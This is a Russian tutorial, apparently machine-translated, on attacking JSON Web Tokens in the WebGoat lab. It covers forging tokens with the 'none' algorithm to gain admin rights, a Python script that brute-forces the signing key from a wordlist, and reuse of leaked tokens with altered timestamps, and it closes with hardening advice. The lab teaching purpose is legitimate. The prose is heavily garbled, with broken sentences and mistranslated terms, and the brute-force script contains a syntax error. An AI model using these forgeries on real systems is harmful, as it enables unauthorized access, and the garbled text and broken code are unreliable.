Предисловие

копать SRC когда сталкиваешься с некоторыми SSO В сцене мы часто видим какие-то странные данные. Большинство этих данных представлены в виде трехэтапного шифрования. В дальнейшем в процессе обучения мы поняли, что имя таких токенов. Token,Я кратко узнал об этом во время моего предыдущего исследования. JWT метод презентации, а только краткий обзор его более глубокого содержания. В этой статье всесторонне объясняется, что такое. JWT,JWT Как использовать и атаковать, чтобы помочь специалистам по безопасности лучше понять механизм работы токенов сетевой безопасности. Эта статья поддерживаетдиапазон АдресWebGoatдиапазонАутентификация и отказчасть。

текст

Введение в JWT

JWT（JSON Web Токен) — это открытый стандарт (RFC 7519), который определяет краткий, автономный метод общения между двумя сторонами. JSON Безопасно передавать информацию в виде объектов. Эту информацию можно проверить и ей можно доверять, поскольку она имеет цифровую подпись. JWT обычно используется в интернет-приложениях для аутентификации и авторизации. JWT и Традиция Token Разница

Компоненты JWT

JWT состоит из трех частей:

• Заголовок: эта часть обычно представляет собой объект JSON.,Описывает JWT алгоритм подписи и другие метаданные.
• Полезная нагрузка: эта часть обычно представляет собой объект JSON, содержащий такие утверждения, как информация об эмитенте, информация о пользователе, срок действия и т. д.
• Подпись: это цифровая подпись заголовка и полезной нагрузки.,Генерируется алгоритм подписи, указанный в заголовке use.,Используется для проверки целостности и подлинности JWT.

потому чтоJWT является автономным, поэтому не требует хранения состояния на сервере, что уменьшает поверхность атаки и позволяет пользователям проходить аутентификацию в системах без состояния. В то же время, потому что чтоJWT передается между клиентами и сервериз, поэтому его также легко междоменное использование。 Далее идет абзац Содержимое JWT, нам нужно найти имя пользователя в токене

Детали токена следующие:

eyJhbGciOiJIUzI1NiJ9.ew0KICAiYXV0aG9yaXRpZXMiIDogWyAiUk9MRV9BRE1JTiIsICJST0xFX1VTRVIiIF0sDQogICJjbGllbnRfaWQiIDogIm15LWNsaWVudC13aXRoLXNlY3JldCIsDQogICJleHAiIDogMTYwNzA5OTYwOCwNCiAgImp0aSIgOiAiOWJjOTJhNDQtMGIxYS00YzVlLWJlNzAtZGE1MjA3NWI5YTg0IiwNCiAgInNjb3BlIiA6IFsgInJlYWQiLCAid3JpdGUiIF0sDQogICJ1c2VyX25hbWUiIDogInVzZXIiDQp9.9lYaULTuoIDJ86-zKDSntJQyHPpJ2mZAbnWRfel99iI

в:

• header частьдляeyJhbGciOiJIUzI1NiJ9
• payloadчастьдляew0KICAiYXV0aG9yaXRpZXMiIDogWyAiUk9MRV9BRE1JTiIsICJST0xFX1VTRVIiIF0sDQogICJjbGllbnRfaWQiIDogIm15LWNsaWVudC13aXRoLXNlY3JldCIsDQogICJleHAiIDogMTYwNzA5OTYwOCwNCiAgImp0aSIgOiAiOWJjOTJhNDQtMGIxYS00YzVlLWJlNzAtZGE1MjA3NWI5YTg0IiwNCiAgInNjb3BlIiA6IFsgInJlYWQiLCAid3JpdGUiIF0sDQogICJ1c2VyX25hbWUiIDogInVzZXIiDQp9
• signatureчастьдля9lYaULTuoIDJ86-zKDSntJQyHPpJ2mZAbnWRfel99iI

Поместив его в платформу декодирования, мы сможем увидеть расшифрованный файл, узнать расшифрованное имя пользователя и пройти стрельбище.

Как работает JWT

Пользователь входит в систему с именем пользователя и паролем после успешной аутентификации на сервереиспользовать. возвращаться. Сервер создает новый токен и возвращает этот токен клиенту. Когда клиент продолжает Вызовите сервер, добавив новый токен в заголовок «Авторизация». Сервер считывает токен и сначала проверяет подпись. После успешной проверки сервер использует. Информация в токене, которая идентифицирует пользователя.

Проблемы безопасности JWT

Нулевой алгоритм шифрования

так называемыйиз“Нулевой алгоритм «шифрование» может относиться к любому алгоритму шифрования без использования JWT, что не распространено в практических приложениях, поскольку шифрование является гарантированной информацией. Однако это правда, что некоторые реализации JWTiz могут не использовать шифрование, особенно в некоторых сценариях, где требования к безопасности не очень высоки. проходить Нулевой алгоритм расшифровку, мы в основном знаем JWT первые двачастьиз Состав и способы применения,Проще говоря, это означаетheaderчастьизalgИзменить наnone,затем вsignatureчасть Ничего нельзя добиться, управляя воздухом Безопасностьиз JWT Влияние алгоритмов шифрования. Конкретный процесс выглядит следующим образом. Например, в следующих сценариях только администратор может сбросить информацию о голосовании:

На этом этапе мы перехватили пакет и обнаружили, что обычные пользователи TOM из JWTжетоннравиться Как показано ниже：

На этом этапе мы помещаем его в платформу декодирования для декодирования и можем получить первые две части:

Затем мы модифицируем пакет данных,Сначала поставьalgсерединашифрование Режим установлен наnone, а потомadminсерединаизfalseИзменить наtrue,переделывать Base64 Закодировав, получим следующее из JWT Запрос отправлен и успешен.

ewogICJhbGciOiAibm9uZSIKfQ.eyJpYXQiOjE3MDkyMjM1MDEsImFkbWluIjoibm9uZSIsInVzZXIiOiJUb20ifQ..

Уведомление,Хотяsignatureчастьдля空,Но его еще нужно добавить перед.номер для достижения соответствия формата,На этом этапе установите его наaccess_tokenвыполнить повтор,Обнаружил, что количество голосов обнулилось.

Сигнатурный взрыв JWT

Иногда мы можем попытаться взорвать JWT изsignatureключ,Хотя ключи зачастую случайные,Но нам нужно понять этот процесс атаки. Код взрывных работ следующий:

import jwt
import termcolor

if __name__ == "__main__":
    jwt_str = R'eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTY3MDc2NTAzOCwiZXhwIjoxNjcwNzY1MDk4LCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.aIR7sjd5o7XJgUkYPCw76e9iF838G-Hh9J-sN1M-J94'

    with open('top1000.txt') as f:
        for line in f:
            key_ = line.strip()
            try:
                jwt.decode(jwt_str, verify=True, key=key_)
                print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
                break
            except (jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError,
                    jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError,
                    jwt.exceptions.ImmatureSignatureError):
                print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
                break
            except jwt.exceptions.InvalidSignatureError:
                print('\r', ' ' * , '\r\btry', key_, end='', flush=True)
                continue
        else:
            print('\r', '\bsorry! no key be found.')

Токен доступа утек

Если Токен доступа утек,Мы можем сотрудничать с модификацией временных меток для выполнения вредоносных операций.,Сравниватьнравиться Однажды у нас появился пользовательизJWTжетоннравиться Вниз：

eyJhbGciOiJIUzUxMiJ9.eyJpYXQiOjE1MjYxMzE0MTEsImV4cCI6MTUyNjIxNzgxMSwiYWRtaW4iOiJmYWxzZSIsInVzZXIiOiJUb20ifQ.DCoaq9zQkyDH25EcVWKcdbyVfUL4c9D4jRvsqOqvi9iAd4QuqmKcchfbU8FNzeBNF9tLeFXHZLU4yRkq-bjm7Q

Путем расшифровки обнаруживается, что временная метка может быть изменена.,Замените его самой последней отметкой времени.,Отправить для достижения успешной аутентификации,Обратите внимание, что для этого все еще требуетсяsignatureУстановить пустым。

Подведите итог: использовать JWT Лучшее место для токена — это связь между серверами. использовать JWT Токен из Некоторые предложения:

• Исправьте алгоритм, чтобы клиенты не могли переключать алгоритмы.
• Подписывая токен симметричным ключом, убедитесь, что длина ключа соответствует.
• Убедитесь, что утверждения, добавленные в токен, не содержат личной информации. Если вам нужно добавить дополнительную информацию, пожалуйста, также выберите токен шифрования.
• Добавьте в проект достаточное количество тестовых примеров.,чтобы убедиться, что недействительный токен действительно не работает. Интеграция с третьей стороной для проверки вашего токена не означает, что вы вообще не тестируете свое приложение.